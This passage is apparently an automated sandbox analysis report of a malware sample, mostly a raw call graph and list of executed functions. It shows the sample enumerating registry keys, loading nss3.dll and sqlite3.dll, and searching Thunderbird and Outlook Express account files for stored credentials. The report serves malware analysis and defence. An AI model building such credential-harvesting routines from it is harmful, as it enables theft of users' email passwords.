CreateFontIndirectA 33357->33300 33359 4019e1 33358->33359 33360 4019c2 strncat 33359->33360 33361 4019e5 memset LoadIconA 33359->33361 33360->33359 33361->33303 33362->33295 33363->33357 33364->33307 33366 407a65 33365->33366 33367 407a5b free 33365->33367 33366->33319 33367->33366 33368->33307 33370 406f37 malloc 33369->33370 33371 406f7d 33369->33371 33373 406f73 33370->33373 33374 406f58 33370->33374 33371->33307 33373->33307 33375 406f6c free 33374->33375 33376 406f5c memcpy 33374->33376 33375->33373 33376->33375 33378 407a38 33377->33378 33379 407a2d free 33377->33379 33381 406f30 3 API calls 33378->33381 33380 407a43 33379->33380 33382 40796e 7 API calls 33380->33382 33381->33380 33382->33318 33399 406f96 GetModuleFileNameA 33383->33399 33385 409805 strrchr 33386 409814 33385->33386 33387 409817 _mbscat 33385->33387 33386->33387 33387->33325 33400 44b090 33388->33400 33393 40930c 3 API calls 33394 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33393->33394 33395 4097c5 LoadStringA 33394->33395 33396 4097db 33395->33396 33396->33395 33398 4097f3 33396->33398 33407 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33396->33407 33398->33245 33399->33385 33401 40973e _mbscpy _mbscpy 33400->33401 33402 40930c 33401->33402 33403 44b090 33402->33403 33404 409319 memset GetPrivateProfileStringA 33403->33404 33405 409374 33404->33405 33406 409364 WritePrivateProfileStringA 33404->33406 33405->33393 33406->33405 33407->33396 33418 406f81 GetFileAttributesA 33408->33418 33410 409675 33411 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33410->33411 33417 4096ee 33410->33417 33419 409278 GetPrivateProfileStringA 33411->33419 33413 4096c9 33420 409278 GetPrivateProfileStringA 33413->33420 33415 4096da 33421 409278 GetPrivateProfileStringA 33415->33421 33417->33246 33418->33410 33419->33413 33420->33415 33421->33417 33513 409c1c 33422->33513 33425 401e69 memset 33552 410dbb 33425->33552 33428 401ec2 33582 4070e3 strlen _mbscat _mbscpy _mbscat 33428->33582 33429 401ed4 33567 406f81 GetFileAttributesA 33429->33567 33432 401ee6 strlen strlen 33434 401f15 33432->33434 33435 401f28 33432->33435 33583 4070e3 strlen _mbscat _mbscpy _mbscat 33434->33583 33568 406f81 GetFileAttributesA 33435->33568 33438 401f35 33569 401c31 33438->33569 33441 401f75 33581 410a9c RegOpenKeyExA 33441->33581 33442 401c31 7 API calls 33442->33441 33444 401f91 33445 402187 33444->33445 33446 401f9c memset 33444->33446 33448 402195 ExpandEnvironmentStringsA 33445->33448 33449 4021a8 _strcmpi 33445->33449 33584 410b62 RegEnumKeyExA 33446->33584 33593 406f81 GetFileAttributesA 33448->33593 33449->33338 33449->33339 33451 40217e RegCloseKey 33451->33445 33452 401fd9 atoi 33453 401fef memset memset sprintf 33452->33453 33461 401fc9 33452->33461 33585 410b1e 33453->33585 33456 402165 33456->33451 33457 402076 memset memset strlen strlen 33457->33461 33458 4070e3 strlen _mbscat _mbscpy _mbscat 33458->33461 33459 4020dd strlen strlen 33459->33461 33460 406f81 GetFileAttributesA 33460->33461 33461->33451 33461->33452 33461->33456 33461->33457 33461->33458 33461->33459 33461->33460 33462 402167 _mbscpy 33461->33462 33592 410b62 RegEnumKeyExA 33461->33592 33462->33451 33464 40c422 33463->33464 33465 40c425 _mbscat _mbscpy _mbscpy 33463->33465 33464->33465 33466 40c49d 33465->33466 33467 40c512 33466->33467 33468 40c502 GetWindowPlacement 33466->33468 33469 40c538 33467->33469 33614 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33467->33614 33468->33467 33607 409b31 33469->33607 33473 40ba28 33474 40ba87 33473->33474 33480 40ba3c 33473->33480 33617 406c62 LoadCursorA SetCursor 33474->33617 33476 40ba8c 33618 410a9c RegOpenKeyExA 33476->33618 33619 404734 33476->33619 33627 4107f1 33476->33627 33630 404785 33476->33630 33633 403c16 33476->33633 33477 40ba43 _mbsicmp 33477->33480 33478 40baa0 33479 407e30 _strcmpi 33478->33479 33483 40bab0 33479->33483 33480->33474 33480->33477 33709 40b5e5 10 API calls 33480->33709 33481 40bafa SetCursor 33481->33346 33483->33481 33484 40baf1 qsort 33483->33484 33484->33481 34067 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33490->34067 33492 40b00e 33493 40b016 33492->33493 33494 40b01f GetStdHandle 33492->33494 34068 406d1a CreateFileA 33493->34068 33496 40b01c 33494->33496 33497 40b035 33496->33497 33498 40b12d 33496->33498 34069 406c62 LoadCursorA SetCursor 33497->34069 34073 406d77 9 API calls 33498->34073 33501 40b136 33512 40c580 28 API calls 33501->33512 33502 40b087 33509 40b0a1 33502->33509 34071 40a699 12 API calls 33502->34071 33503 40b042 33503->33502 33503->33509 34070 40a57c strlen WriteFile 33503->34070 33506 40b0d6 33507 40b116 CloseHandle 33506->33507 33508 40b11f SetCursor 33506->33508 33507->33508 33508->33501 33509->33506 34072 406d77 9 API calls 33509->34072 33511->33339 33512->33343 33525 409a32 33513->33525 33516 409c80 memcpy memcpy 33517 409cda 33516->33517 33517->33516 33518 409d18 ??2@YAPAXI ??2@YAPAXI 33517->33518 33519 408db6 12 API calls 33517->33519 33521 409d54 ??2@YAPAXI 33518->33521 33522 409d8b 33518->33522 33519->33517 33521->33522 33522->33522 33535 409b9c 33522->33535 33524 4023c1 33524->33425 33526 409a44 33525->33526 33527 409a3d ??3@YAXPAX 33525->33527 33528 409a52 33526->33528 33529 409a4b ??3@YAXPAX 33526->33529 33527->33526 33530 409a63 33528->33530 33531 409a5c ??3@YAXPAX 33528->33531 33529->33528 33532 409a83 ??2@YAPAXI ??2@YAPAXI 33530->33532 33533 409a73 ??3@YAXPAX 33530->33533 33534 409a7c ??3@YAXPAX 33530->33534 33531->33530 33532->33516 33533->33534 33534->33532 33536 407a55 free 33535->33536 33537 409ba5 33536->33537 33538 407a55 free 33537->33538 33539 409bad 33538->33539 33540 407a55 free 33539->33540 33541 409bb5 33540->33541 33542 407a55 free 33541->33542 33543 409bbd 33542->33543 33544 407a1f 4 API calls 33543->33544 33545 409bd0 33544->33545 33546 407a1f 4 API calls 33545->33546 33547 409bda 33546->33547 33548 407a1f 4 API calls 33547->33548 33549 409be4 33548->33549 33550 407a1f 4 API calls 33549->33550 33551 409bee 33550->33551 33551->33524 33553 410d0e 2 API calls 33552->33553 33554 410dca 33553->33554 33555 410dfd memset 33554->33555 33594 4070ae 33554->33594 33557 410e1d 33555->33557 33597 410a9c RegOpenKeyExA 33557->33597 33560 401e9e strlen strlen 33560->33428 33560->33429 33561 410e4a 33562 410e7f _mbscpy 33561->33562 33598 410d3d _mbscpy 33561->33598 33562->33560 33564 410e5b 33599 410add RegQueryValueExA 33564->33599 33566 410e73 RegCloseKey 33566->33562 33567->33432 33568->33438 33600 410a9c RegOpenKeyExA 33569->33600 33571 401c4c 33572 401cad 33571->33572 33601 410add RegQueryValueExA 33571->33601 33572->33441 33572->33442 33574 401c6a 33575 401c71 strchr 33574->33575 33576 401ca4 RegCloseKey 33574->33576 33575->33576 33577 401c85 strchr 33575->33577 33576->33572 33577->33576 33578 401c94 33577->33578 33602 406f06 strlen 33578->33602 33580 401ca1 33580->33576 33581->33444 33582->33429 33583->33435 33584->33461 33605 410a9c RegOpenKeyExA 33585->33605 33587 410b34 33588 410b5d 33587->33588 33606 410add RegQueryValueExA 33587->33606 33588->33461 33590 410b4c RegCloseKey 33590->33588 33592->33461 33593->33449 33595 4070bd GetVersionExA 33594->33595 33596 4070ce 33594->33596 33595->33596 33596->33555 33596->33560 33597->33561 33598->33564 33599->33566 33600->33571 33601->33574 33603 406f17 33602->33603 33604 406f1a memcpy 33602->33604 33603->33604 33604->33580 33605->33587 33606->33590 33608 409b40 33607->33608 33610 409b4e 33607->33610 33615 409901 memset SendMessageA 33608->33615 33611 409b99 33610->33611 33612 409b8b 33610->33612 33611->33473 33616 409868 SendMessageA 33612->33616 33614->33469 33615->33610 33616->33611 33617->33476 33618->33478 33620 404785 FreeLibrary 33619->33620 33621 40473b LoadLibraryA 33620->33621 33622 40474c GetProcAddress 33621->33622 33623 40476e 33621->33623 33622->33623 33624 404764 33622->33624 33625 404781 33623->33625 33626 404785 FreeLibrary 33623->33626 33624->33623 33625->33478 33626->33625 33628 410807 33627->33628 33629 4107fc FreeLibrary 33627->33629 33628->33478 33629->33628 33631 4047a3 33630->33631 33632 404799 FreeLibrary 33630->33632 33631->33478 33632->33631 33634 4107f1 FreeLibrary 33633->33634 33635 403c30 LoadLibraryA 33634->33635 33636 403c74 33635->33636 33637 403c44 GetProcAddress 33635->33637 33639 4107f1 FreeLibrary 33636->33639 33637->33636 33638 403c5e 33637->33638 33638->33636 33642 403c6b 33638->33642 33640 403c7b 33639->33640 33641 404734 3 API calls 33640->33641 33643 403c86 33641->33643 33642->33640 33710 4036e5 33643->33710 33646 4036e5 27 API calls 33647 403c9a 33646->33647 33648 4036e5 27 API calls 33647->33648 33649 403ca4 33648->33649 33650 4036e5 27 API calls 33649->33650 33651 403cae 33650->33651 33722 4085d2 33651->33722 33659 403ce5 33660 403cf7 33659->33660 33903 402bd1 40 API calls 33659->33903 33768 410a9c RegOpenKeyExA 33660->33768 33663 403d0a 33664 403d1c 33663->33664 33904 402bd1 40 API calls 33663->33904 33769 402c5d 33664->33769 33668 4070ae GetVersionExA 33669 403d31 33668->33669 33787 410a9c RegOpenKeyExA 33669->33787 33671 403d51 33672 403d61 33671->33672 33905 402b22 47 API calls 33671->33905 33788 410a9c RegOpenKeyExA 33672->33788 33675 403d87 33676 403d97 33675->33676 33906 402b22 47 API calls 33675->33906 33789 410a9c RegOpenKeyExA 33676->33789 33679 403dbd 33680 403dcd 33679->33680 33907 402b22 47 API calls 33679->33907 33790 410808 33680->33790 33684 404785 FreeLibrary 33685 403de8 33684->33685 33794 402fdb 33685->33794 33688 402fdb 34 API calls 33689 403e00 33688->33689 33810 4032b7 33689->33810 33698 403e3b 33700 403e73 33698->33700 33701 403e46 _mbscpy 33698->33701 33857 40fb00 33700->33857 33909 40f334 334 API calls 33701->33909 33709->33480 33711 4036fb 33710->33711 33714 4037c5 33710->33714 33910 410863 UuidFromStringA UuidFromStringA memcpy CoTaskMemFree 33711->33910 33713 40370e 33713->33714 33715 403716 strchr 33713->33715 33714->33646 33715->33714 33716 403730 33715->33716 33911 4021b6 memset 33716->33911 33718 40373f _mbscpy _mbscpy strlen 33719 4037a4 _mbscpy 33718->33719 33720 403789 sprintf 33718->33720 33912 4023e5 16 API calls 33719->33912 33720->33719 33723 4085e2 33722->33723 33913 4082cd 11 API calls 33723->33913 33727 408600 33728 403cba 33727->33728 33729 40860b memset 33727->33729 33740 40821d 33728->33740 33916 410b62 RegEnumKeyExA 33729->33916 33731 408637 33732 4086d2 RegCloseKey 33731->33732 33734 40865c memset 33731->33734 33917 410a9c RegOpenKeyExA 33731->33917 33920 410b62 RegEnumKeyExA 33731->33920 33732->33728 33918 410add RegQueryValueExA 33734->33918 33737 408694 33919 40848b 10 API calls 33737->33919 33739 4086ab RegCloseKey 33739->33731 33921 410a9c RegOpenKeyExA 33740->33921 33742 40823f 33743 403cc6 33742->33743 33744 408246 memset 33742->33744 33752 4086e0 33743->33752 33922 410b62 RegEnumKeyExA 33744->33922 33746 4082bf RegCloseKey 33746->33743 33748 40826f 33748->33746 33923 410a9c RegOpenKeyExA 33748->33923 33924 4080ed 11 API calls 33748->33924 33925 410b62 RegEnumKeyExA 33748->33925 33751 4082a2 RegCloseKey 33751->33748 33926 4045db 33752->33926 33757 408737 wcslen 33758 4088ef 33757->33758 33764 40876a 33757->33764 33934 404656 33758->33934 33759 40877a wcsncmp 33759->33764 33761 404734 3 API calls 33761->33764 33762 404785 FreeLibrary 33762->33764 33763 408812 memset 33763->33764 33765 40883c memcpy wcschr 33763->33765 33764->33758 33764->33759 33764->33761 33764->33762 33764->33763 33764->33765 33766 4088c3 LocalFree 33764->33766 33937 40466b _mbscpy 33764->33937 33765->33764 33766->33764 33767 410a9c RegOpenKeyExA 33767->33659 33768->33663 33938 410a9c RegOpenKeyExA 33769->33938 33771 402c7a 33772 402da5 33771->33772 33773 402c87 memset 33771->33773 33772->33668 33939 410b62 RegEnumKeyExA 33773->33939 33775 402d9c RegCloseKey 33775->33772 33776 410b1e 3 API calls 33777 402ce4 memset sprintf 33776->33777 33940 410a9c RegOpenKeyExA 33777->33940 33779 402d28 33780 402d3a sprintf 33779->33780 33941 402bd1 40 API calls 33779->33941 33942 410a9c RegOpenKeyExA 33780->33942 33783 402cb2 33783->33775 33783->33776 33786 402d9a 33783->33786 33943 402bd1 40 API calls 33783->33943 33944 410b62 RegEnumKeyExA 33783->33944 33786->33775 33787->33671 33788->33675 33789->33679 33791 410816 33790->33791 33792 4107f1 FreeLibrary 33791->33792 33793 403ddd 33792->33793 33793->33684 33945 410a9c RegOpenKeyExA 33794->33945 33796 402ff9 33797 403006 memset 33796->33797 33798 40312c 33796->33798 33946 410b62 RegEnumKeyExA 33797->33946 33798->33688 33800 403122 RegCloseKey 33800->33798 33801 410b1e 3 API calls 33802 403058 memset sprintf 33801->33802 33947 410a9c RegOpenKeyExA 33802->33947 33804 403033 33804->33800 33804->33801 33805 4030a2 memset 33804->33805 33806 410b62 RegEnumKeyExA 33804->33806 33808 4030f9 RegCloseKey 33804->33808 33949 402db3 26 API calls 33804->33949 33948 410b62 RegEnumKeyExA 33805->33948 33806->33804 33808->33804 33811 4032d5 33810->33811 33812 4033a9 33810->33812 33950 4021b6 memset 33811->33950 33825 4034e4 memset memset 33812->33825 33814 4032e1 33951 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33814->33951 33816 4032ea 33817 4032f8 memset GetPrivateProfileSectionA 33816->33817 33952 4023e5 16 API calls 33816->33952 33817->33812 33822 40332f 33817->33822 33819 40339b strlen 33819->33812 33819->33822 33821 403350 strchr 33821->33822 33822->33812 33822->33819 33953 4021b6 memset 33822->33953 33954 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33822->33954 33955 4023e5 16 API calls 33822->33955 33826 410b1e 3 API calls 33825->33826 33827 40353f 33826->33827 33828 40357f 33827->33828 33829 403546 _mbscpy 33827->33829 33833 403985 33828->33833 33956 406d55 strlen _mbscat 33829->33956 33831 403565 _mbscat 33957 4033f0 19 API calls 33831->33957 33958 40466b _mbscpy 33833->33958 33837 4039aa 33838 4039ff 33837->33838 33959 40f460 memset memset 33837->33959 33980 40f6e2 33837->33980 33996 4038e8 21 API calls 33837->33996 33840 404785 FreeLibrary 33838->33840 33841 403a0b 33840->33841 33842 4037ca memset memset 33841->33842 34004 444551 memset 33842->34004 33845 4038e2 33845->33698 33908 40f334 334 API calls 33845->33908 33847 40382e 33848 406f06 2 API calls 33847->33848 33849 403843 33848->33849 33850 406f06 2 API calls 33849->33850 33851 403855 strchr 33850->33851 33852 403884 _mbscpy 33851->33852 33853 403897 strlen 33851->33853 33854 4038bf _mbscpy 33852->33854 33853->33854 33855 4038a4 sprintf 33853->33855 34016 4023e5 16 API calls 33854->34016 33855->33854 33858 44b090 33857->33858 33859 40fb10 RegOpenKeyExA 33858->33859 33860 403e7f 33859->33860 33861 40fb3b RegOpenKeyExA 33859->33861 33871 40f96c 33860->33871 33862 40fb55 RegQueryValueExA 33861->33862 33863 40fc2d RegCloseKey 33861->33863 33864 40fc23 RegCloseKey 33862->33864 33865 40fb84 33862->33865 33863->33860 33864->33863 33866 404734 3 API calls 33865->33866 33867 40fb91 33866->33867 33867->33864 33868 40fc19 LocalFree 33867->33868 33869 40fbdd memcpy memcpy 33867->33869 33868->33864 34021 40f802 11 API calls 33869->34021 33872 4070ae GetVersionExA 33871->33872 33873 40f98d 33872->33873 33874 4045db 7 API calls 33873->33874 33882 40f9a9 33874->33882 33875 40fae6 33876 404656 FreeLibrary 33875->33876 33877 403e85 33876->33877 33883 4442ea memset 33877->33883 33878 40fa13 memset WideCharToMultiByte 33879 40fa43 _strnicmp 33878->33879 33878->33882 33880 40fa5b WideCharToMultiByte 33879->33880 33879->33882 33881 40fa88 WideCharToMultiByte 33880->33881 33880->33882 33881->33882 33882->33875 33882->33878 33884 410dbb 9 API calls 33883->33884 33885 444329 33884->33885 34022 40759e strlen strlen 33885->34022 33890 410dbb 9 API calls 33891 444350 33890->33891 33892 40759e 3 API calls 33891->33892 33893 44435a 33892->33893 33894 444212 65 API calls 33893->33894 33895 444366 memset memset 33894->33895 33896 410b1e 3 API calls 33895->33896 33897 4443b9 ExpandEnvironmentStringsA strlen 33896->33897 33898 4443f4 _strcmpi 33897->33898 33899 4443e5 33897->33899 33900 403e91 33898->33900 33901 44440c 33898->33901 33899->33898 33900->33478 33902 444212 65 API calls 33901->33902 33902->33900 33903->33660 33904->33664 33905->33672 33906->33676 33907->33680 33908->33698 33909->33700 33910->33713 33911->33718 33912->33714 33914 40841c 33913->33914 33915 410a9c RegOpenKeyExA 33914->33915 33915->33727 33916->33731 33917->33731 33918->33737 33919->33739 33920->33731 33921->33742 33922->33748 33923->33748 33924->33751 33925->33748 33927 404656 FreeLibrary 33926->33927 33928 4045e3 LoadLibraryA 33927->33928 33929 404651 33928->33929 33930 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33928->33930 33929->33757 33929->33758 33931 40463d 33930->33931 33932 404643 33931->33932 33933 404656 FreeLibrary 33931->33933 33932->33929 33933->33929 33935 403cd2 33934->33935 33936 40465c FreeLibrary 33934->33936 33935->33767 33936->33935 33937->33764 33938->33771 33939->33783 33940->33779 33941->33780 33942->33783 33943->33783 33944->33783 33945->33796 33946->33804 33947->33804 33948->33804 33949->33804 33950->33814 33951->33816 33952->33817 33953->33821 33954->33822 33955->33822 33956->33831 33957->33828 33958->33837 33997 4078ba 33959->33997 33962 4078ba _mbsnbcat 33963 40f5a3 RegOpenKeyExA 33962->33963 33964 40f5c3 RegQueryValueExA 33963->33964 33965 40f6d9 33963->33965 33966 40f6d0 RegCloseKey 33964->33966 33967 40f5f0 33964->33967 33965->33837 33966->33965 33967->33966 33968 40f675 33967->33968 34001 40466b _mbscpy 33967->34001 33968->33966 34002 4012ee strlen 33968->34002 33970 40f611 33972 404734 3 API calls 33970->33972 33977 40f616 33972->33977 33973 40f69e RegQueryValueExA 33973->33966 33974 40f6c1 33973->33974 33974->33966 33975 40f66a 33976 404785 FreeLibrary 33975->33976 33976->33968 33977->33975 33978 40f661 LocalFree 33977->33978 33979 40f645 memcpy 33977->33979 33978->33975 33979->33978 34003 40466b _mbscpy 33980->34003 33982 40f6fa 33983 4045db 7 API calls 33982->33983 33984 40f708 33983->33984 33985 40f7e2 33984->33985 33986 404734 3 API calls 33984->33986 33987 404656 FreeLibrary 33985->33987 33991 40f715 33986->33991 33988 40f7f1 33987->33988 33989 404785 FreeLibrary 33988->33989 33990 40f7fc 33989->33990 33990->33837 33991->33985 33992 40f797 WideCharToMultiByte 33991->33992 33993 40f7b8 strlen 33992->33993 33994 40f7d9 LocalFree 33992->33994 33993->33994 33995 40f7c8 _mbscpy 33993->33995 33994->33985 33995->33994 33996->33837 33998 4078e6 33997->33998 33999 4078c7 _mbsnbcat 33998->33999 34000 4078ea 33998->34000 33999->33998 34000->33962 34001->33970 34002->33973 34003->33982 34017 410a9c RegOpenKeyExA 34004->34017 34006 44458b 34007 40381a 34006->34007 34018 410add RegQueryValueExA 34006->34018 34007->33845 34015 4021b6 memset 34007->34015 34009 4445dc RegCloseKey 34009->34007 34010 4445a4 34010->34009 34019 410add RegQueryValueExA 34010->34019 34012 4445c1 34012->34009 34020 444879 30 API calls 34012->34020 34014 4445da 34014->34009 34015->33847 34016->33845 34017->34006 34018->34010 34019->34012 34020->34014 34021->33868 34023 4075c9 34022->34023 34024 4075bb _mbscat 34022->34024 34025 444212 34023->34025 34024->34023 34042 407e9d 34025->34042 34028 44424d 34029 444274 34028->34029 34030 444258 34028->34030 34050 407ef8 34028->34050 34031 407e9d 9 API calls 34029->34031 34063 444196 52 API calls 34030->34063 34038 4442a0 34031->34038 34033 407ef8 9 API calls 34033->34038 34034 4442ce 34060 407f90 34034->34060 34038->34033 34038->34034 34040 444212 65 API calls 34038->34040 34064 407e62 strcmp strcmp 34038->34064 34039 407f90 FindClose 34041 4442e4 34039->34041 34040->34038 34041->33890 34043 407f90 FindClose 34042->34043 34044 407eaa 34043->34044 34045 406f06 2 API calls 34044->34045 34046 407ebd strlen strlen 34045->34046 34047 407ee1 34046->34047 34048 407eea 34046->34048 34065 4070e3 strlen _mbscat _mbscpy _mbscat 34047->34065 34048->34028 34051 407f03 FindFirstFileA 34050->34051 34052 407f24 FindNextFileA 34050->34052 34053 407f3f 34051->34053 34054 407f46 strlen strlen 34052->34054 34055 407f3a 34052->34055 34053->34054 34057 407f7f 34053->34057 34054->34057 34058 407f76 34054->34058 34056 407f90 FindClose 34055->34056 34056->34053 34057->34028 34066 4070e3 strlen _mbscat _mbscpy _mbscat 34058->34066 34061 407fa3 34060->34061 34062 407f99 FindClose 34060->34062 34061->34039 34062->34061 34063->34028 34064->34038 34065->34048 34066->34057 34067->33492 34068->33496 34069->33503 34070->33502 34071->33509 34072->33506 34073->33501 34418 43ffc8 18 API calls 34232 4281cc 15 API calls __fprintf_l 34420 4383cc 110 API calls __fprintf_l 34233 4275d3 41 API calls 34421 4153d3 22 API calls __fprintf_l 34234 444dd7 _XcptFilter 34426 4013de 15 API calls 34428 425115 111 API calls __fprintf_l 34429 43f7db 18 API calls 34432 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34236 4335ee 16 API calls __fprintf_l 34434 429fef 11 API calls 34237 444deb _exit _c_exit 34435 40bbf0 138 API calls 34240 425115 79 API calls __fprintf_l 34439 437ffa 22 API calls 34244 4021ff 14 API calls 34245 43f5fc 149 API calls 34440 40e381 9 API calls 34247 405983 40 API calls 34248 42b186 27 API calls __fprintf_l 34249 427d86 76 API calls 34250 403585 20 API calls 34252 42e58e 18 API calls __fprintf_l 34255 425115 75 API calls __fprintf_l 34257 401592 8 API calls 33159 410b92 33162 410a6b 33159->33162 33161 410bb2 33163 410a77 33162->33163 33164 410a89 GetPrivateProfileIntA 33162->33164 33167 410983 memset _itoa WritePrivateProfileStringA 33163->33167 33164->33161 33166 410a84 33166->33161 33167->33166 34444 434395 16 API calls 34259 441d9c memcmp 34446 43f79b 119 API calls 34260 40c599 43 API calls 34447 426741 87 API calls 34264 4401a6 21 API calls 34266 426da6 memcpy memset memset memcpy 34267 4335a5 15 API calls 34269 4299ab memset memset memcpy memset memset 34270 40b1ab 8 API calls 34452 425115 76 API calls __fprintf_l 34456 4113b2 18 API calls 2 library calls 34460 40a3b8 memset sprintf SendMessageA 34074 410bbc 34077 4109cf 34074->34077 34078 4109dc 34077->34078 34079 410a23 memset GetPrivateProfileStringA 34078->34079 34080 4109ea memset 34078->34080 34085 407646 strlen 34079->34085 34090 4075cd sprintf memcpy 34080->34090 34083 410a0c WritePrivateProfileStringA 34084 410a65 34083->34084 34086 40765a 34085->34086 34087 40765c 34085->34087 34086->34084 34089 4076a3 34087->34089 34091 40737c strtoul 34087->34091 34089->34084 34090->34083 34091->34087 34272 40b5bf memset memset _mbsicmp

                                        Executed Functions

                                        Function 004082CD Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 145stringCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 135 408432-40844e 132->135 136 40842d-408431 132->136 137 408460-408464 134->137 138 408465-408482 134->138 135->130 135->132 136->135 137->138 138->133 138->134
                                        APIs
                                        • memset.MSVCRT ref: 0040832F
                                        • memset.MSVCRT ref: 00408343
                                        • memset.MSVCRT ref: 0040835F
                                        • memset.MSVCRT ref: 00408376
                                        • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                        • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                        • strlen.MSVCRT ref: 004083E9
                                        • strlen.MSVCRT ref: 004083F8
                                        • memcpy.MSVCRT(?,000000A3,00000010,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040840A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                        • String ID: 5$H$O$b$i$}$}
                                        • API String ID: 1832431107-3760989150
                                        • Opcode ID: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
                                        • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                        • Opcode Fuzzy Hash: a5ed1eb31af54c8a3c73713876d0dfdb02d87ab57461c694f2cbdc33214a2147
                                        • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
                                        Function 00407EF8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58filestringCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 450 407ef8-407f01 451 407f03-407f22 FindFirstFileA 450->451 452 407f24-407f38 FindNextFileA 450->452 453 407f3f-407f44 451->453 454 407f46-407f74 strlen * 2 452->454 455 407f3a call 407f90 452->455 453->454 457 407f89-407f8f 453->457 458 407f83 454->458 459 407f76-407f81 call 4070e3 454->459 455->453 461 407f86-407f88 458->461 459->461 461->457
                                        APIs
                                        • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                        • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                        • strlen.MSVCRT ref: 00407F5C
                                        • strlen.MSVCRT ref: 00407F64
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        • Associated: 00000006.00000002.1759097502.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_6_2_400000_orders_PI 008-01.jbxd
                                        Similarity
                                        • API ID: FileFindstrlen$FirstNext
                                        • String ID: ACD
                                        • API String ID: 379999529-620537770
                                        • Opcode ID: ac238b99766b2c560e4788d49261b3e8246b44fda50c364b2703e5efa62775d4
                                        • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                                        • Opcode Fuzzy Hash: ac238b99766b2c560e4788d49261b3e8246b44fda50c364b2703e5efa62775d4
                                        • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A
                                        Function 00401E69 Relevance: 52.8, APIs: 19, Strings: 11, Instructions: 261stringregistryCOMMON
                                        Download Yara Rule

                                        Control-flow Graph

                                        APIs
                                        • memset.MSVCRT ref: 00401E8B
                                        • strlen.MSVCRT ref: 00401EA4
                                        • strlen.MSVCRT ref: 00401EB2
                                        • strlen.MSVCRT ref: 00401EF8
                                        • strlen.MSVCRT ref: 00401F06
                                        • memset.MSVCRT ref: 00401FB1
                                        • atoi.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00401FE0
                                        • memset.MSVCRT ref: 00402003
                                        • sprintf.MSVCRT ref: 00402030
                                          • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                                        • memset.MSVCRT ref: 00402086
                                        • memset.MSVCRT ref: 0040209B
                                        • strlen.MSVCRT ref: 004020A1
                                        • strlen.MSVCRT ref: 004020AF
                                        • strlen.MSVCRT ref: 004020E2
                                        • strlen.MSVCRT ref: 004020F0
                                        • memset.MSVCRT ref: 00402018
                                          • Part of subcall function 004070E3: _mbscpy.MSVCRT(00000000,00000000,sqlite3.dll,00402116,00000000,nss3.dll), ref: 004070EB
                                          • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                                        • _mbscpy.MSVCRT(?,00000000), ref: 00402177
                                        • RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00402181
                                        • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040219C
                                          • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00409675,?,0040972B,00000000,?,00000000,00000104,?), ref: 00406F85
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000006.00000002.1759097502.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000006.00000002.1759097502.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
